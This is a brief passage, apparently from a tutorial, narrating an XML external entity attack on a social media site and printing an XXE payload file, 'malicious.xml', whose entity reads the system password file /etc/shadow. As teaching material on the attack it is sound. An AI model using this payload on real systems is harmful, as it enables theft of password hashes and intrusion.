Next he crafts a URL to the social media site mentioning the URL of his malicious XML file.
malicious.xml
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xrds [ <!ENTITY passwords SYSTEM "file://etc/shadow"> ]> <xrds> &passwords; </xrds>